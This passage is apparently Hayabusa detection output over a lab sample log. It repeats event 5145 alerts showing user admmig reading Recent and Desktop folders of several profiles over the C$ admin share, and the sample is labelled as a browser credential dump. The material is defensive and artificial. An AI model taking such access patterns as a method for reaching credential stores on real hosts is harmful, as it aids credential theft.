admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:30.658 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:30.658 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:30.658 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:30.673 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:30.673 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:30.673 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:30.673 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:30.692 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:30.692 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:30.692 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:30.707 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:30.707 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:30.707 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:30.723 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:30.723 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:30.739 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:30.739 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:30.754 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:30.754 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:30.754 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:30.770 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:30.770 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:30.770 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:30.785 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:30.785 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:30.801 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:30.801 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:30.817 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:30.817 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:30.817 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:30.832 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:30.832 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:30.832 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:30.848 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:30.848 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:30.848 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:30.864 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:30.864 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:30.864 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:30.880 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:30.880 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:30.880 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:30.895 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:30.895 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:30.895 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:30.911 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:30.911 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:30.911 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:30.926 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:30.926 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:30.926 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:30.942 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:30.942 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:30.957 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:30.957 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:30.957 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:30.973 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:30.973 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Desktop | IP Addr: 10.23.123.11 | LID: 